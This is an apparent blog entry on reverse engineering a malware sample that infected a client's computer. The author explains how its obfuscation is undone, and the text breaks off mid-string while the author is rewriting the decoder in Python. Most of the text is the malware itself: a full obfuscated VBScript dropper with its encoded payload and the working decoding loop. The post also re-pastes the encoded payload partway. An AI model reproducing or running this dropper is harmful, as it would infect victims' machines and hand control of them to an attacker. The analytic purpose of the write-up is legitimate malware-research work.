
Malware hunting

Created: Jan 6, 2022 12:47 PM
Tags: Analysis
On Jan 5, 2022, to begin the new year, my brother asked me for help reverse engineering a weird piece of malware that had infected one of his clients.
Malware code
dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖ܏ܲݞݓݔݓ܏ݑݨ܏ݥݎܱܟܠۼ۹ܾݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ۼ۹ݙ܏ܬ܏ݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖ܏ܬ܏ݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲ݋ݥݦܟݡݜܑܛܑ݋݂ݞݕݣݦݐݡݔ݋ܼݘݒݡݞݢݞݕݣ݋݆ݘݝݓݞݦݢ݋ܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݋݁ݤݝ݋ܑܛܑܷܻܼܺ݋݂ܾ݆ܴܵ݃ܰ݁݋ܲݛݐݢݢݔݢ݋ܑܛܑܴ݁ܶݎܑ݂݉ܛܑ݋ݓݔݕݐݤݛݣݘݒݞݝ݋ܑܘۼ۹ݨܬ܏ݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ݖݞܗݜܘۼ۹ݘݕ܏ݜܬܣ܏ݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘ܏ܕ܏ܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔ܏ۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕ܏ݖݞܬܑܑ܏ݣݗݔݝ܏ݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݘݕ܏ݜ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕ܏ݜ܏ܬ܏ܡ܏ݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓ܏ݘݕۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝ܏ۼ۹ۼ۹ݢݔݣ܏ݦ܏ܬ܏݆݂ݒݡݘݟݣۼ۹ݢݔݣ܏ݢݗ܏ܬ܏ܲݡܗܟܘۼ۹ݢݔݣ܏ݕݢ܏ܬ܏ܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ܲݡܗܽܘۼ۹݂ݔݣ܏ܲݡ܏ܬ܏ܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܴݧܗݢܘۼ۹ܴݧ܏ܬ܏ݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ܏݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝ܏ܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡ܏ܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓ܏ܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽ܏ܕ܏ܑݎܑ܏ܕ܏ݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑ܏ܽݢۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔ܏ݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝ܏ܑݢݒݗݣݐݢݚݢ܏ܞݒݡݔݐݣݔ܏ܞݢݒ܏ݜݘݝݤݣݔ܏ܞݜݞ܏ܠ܏ܞݣݝ܏݂ݚݨݟݔ܏ܞݣݡ܏ܑ܏ܕ܏ܲݗݡ݆ܗܢܣܘ܏ܕ܏ݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܟܘ܏ܕ܏ݖܗܢܘ܏ܕ܏ܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛ܏ܲݗ܏ܕ܏ݓݡ܏ܕ܏ܲݗܛ܏ݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛ܏ܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗ܏ܕܲ܏ܕ܏ݦݝ܏ܛݣݡݤݔۼ۹ݔݝݓ܏݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ۼ۹ݢݤݑ܏ݢݟݡۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݓݡ܏ݘݝ܏ݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗ܏ܕ܏ݒۼ۹ݘݕ܏ݓݡܝ
ݘݢݡݔݐݓݨ܏ܬ܏ݣݡݤݔ܏ݣݗݔݝۼ۹ݘݕ܏ݓݡܝݓݡݘݥݔݣݨݟݔ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛݓݟ܏ܕ܏ݦݝܛݣݡݤݔۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟ܏ܕ܏ݦݝܘ܏ݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟ܏ܕ܏ݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓ܏ݘݕۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݘ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕ܏ݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ݣݗݔݝۼ۹ݘݕ܏ݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘ܏ܫܭܑݛݝݚܑ܏ݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕ܏ݤݒݐݢݔܗݕݘܝݝݐݜݔܘ܏ܫܭ܏ݤݒݐݢݔܗݦݝܘ܏ݣݗݔݝۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘ܏ܕ܏ܑܝݛݝݚܑܘ܏ۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔ܏ܬ܏ܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗ܏ܬ܏ܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢ܏ܬ܏ܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒ܏ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ܑܝܑ܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܘܘܕ܏ݒܘ܏ܕ܏ݖܗܥܘܘ܏ۼ۹ݘݕ܏ݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘ܏ܬ܏ܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘܝݟݐݣݗۼ۹ݔݛݢݔ܏ۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘݒۼ۹܏ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݞ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏ܕ܏ݕݞܝݝݐݜݔ܏ܕ܏ܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ݔݧݟݛݞݡݔݡ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺ݋ݢݞݕݣݦݐݡݔ݋ݒݛݐݢݢݔݢ݋ݕݞݛݓݔݡܑ܏ܕ܏ݖܗܥܘܘۼ۹ݘݕ܏ݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓ܏ݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗ܏ܬ܏ݒݗݡݦܗܢܣܘۼ۹ݒ܏ܬ܏ݒݗݡݦܗܨܡܘۼ۹ݕݤ܏ܬ܏ݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘ܏ܕ܏ܑ݋ܼݘݒݡݞݢݞݕݣܝܴܽ݃݋ܵݡݐݜݔݦݞݡݚ݋ݥܡܝܟܝܤܟܦܡܦ݋ݥݑݒܝݔݧݔܑܘ܏ݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹݄ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ܏݄ܬܑܑ܏ݣݗݔݝۼ۹ݘݕ܏ݜݘݓܗݕݤܛܡܘܬܑܩ݋ܑ܏ܕ܏ݦݝ܏ݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔ܏ݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣ܏ݒݐݢݔ܏ݢܗܟܘۼ۹ݒݐݢݔ܏ܑݔݧݒܑۼ۹ݢݐܬ܏ݢܗܠܘۼ۹ݔݧݔݒݤݣݔ܏ݢݐۼ۹ݒݐݢݔ܏ܑ݂ݒܑۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡܛ܏ܥۼ۹ݒݐݢݔ܏ܑܑ݁ܵۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡ
ݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡۼ۹ݒݐݢݔ܏ܑ݁ݔݝܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕ܏ܬ܏ݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕ܏ܬ܏ݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔ܏ܑ݄ݟܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ܑݦݢݒݡݘݟݣܝݔݧݔ܏ܞܞܱ܏ܑ܏ܕ܏ݒݗ܏ܕ܏ݕݤ܏ܕ܏ݒݗܛ܏ܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔ܏ܑܲݛܑۼ۹݆ܝݠݤݘݣ܏ۼ۹ݒݐݢݔ܏ܑ݄ݝܑۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ܏݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓ܏ݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟ܏ܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = "" Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0 dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0 dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS" qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0 do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl) mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1 qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + 
AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1)) loop do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy) wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1 QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)) loop Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf
The malware’s dropper script (VBScript, the Visual Basic dialect run by wscript.exe)
At first glance it looks encrypted. But around the long Unicode string the code is ordinary VBScript (dim, do until ... loop, Mid, AscW, ChrW, Wscript.Echo), so the string is only obfuscated, and the routine that undoes it is right there in the file: the first loop sums the character codes of the short key string "HGFTYtdcyfsaty!@#FFDS", the second loop takes every character of the long string, subtracts that sum (plus the key length back) from its code point and appends the result, and the final Wscript.Echo outputs the recovered text. Nothing has to be fetched from anywhere to decode it.
So I opened a new Python script and started to retype the whole thing with clear variable names, to understand the script’s arithmetic in depth.
Rewritten code
def mid(s, offset, amount): return s[offset-1:offset+amount-1] var5 = "HGFTYtdcyfsaty!@#FFDS" var6 = 0 for x in range(1, len(var5)+1): var6 += ord(mid(var5, x, 1)) print(var6) var1 = "ܖ܏ܲݞݓݔݓ܏ݑݨ܏ݥݎܱܟܠۼ۹ܾݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ۼ۹ݙ܏ܬ܏ݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖ܏ܬ܏ݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲ݋ݥݦܟݡݜܑܛܑ݋݂ݞݕݣݦݐݡݔ݋ܼݘݒݡݞݢݞݕݣ݋݆ݘݝݓݞݦݢ݋ܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݋݁ݤݝ݋ܑܛܑܷܻܼܺ݋݂ܾ݆ܴܵ݃ܰ݁݋ܲݛݐݢݢݔݢ݋ܑܛܑܴ݁ܶݎܑ݂݉ܛܑ݋ݓݔݕݐݤݛݣݘݒݞݝ݋ܑܘۼ۹ݨܬ܏ݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ݖݞܗݜܘۼ۹ݘݕ܏ݜܬܣ܏ݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘ܏ܕ܏ܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔ܏ۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕ܏ݖݞܬܑܑ܏ݣݗݔݝ܏ݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݘݕ܏ݜ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕ܏ݜ܏ܬ܏ܡ܏ݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓ܏ݘݕۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝ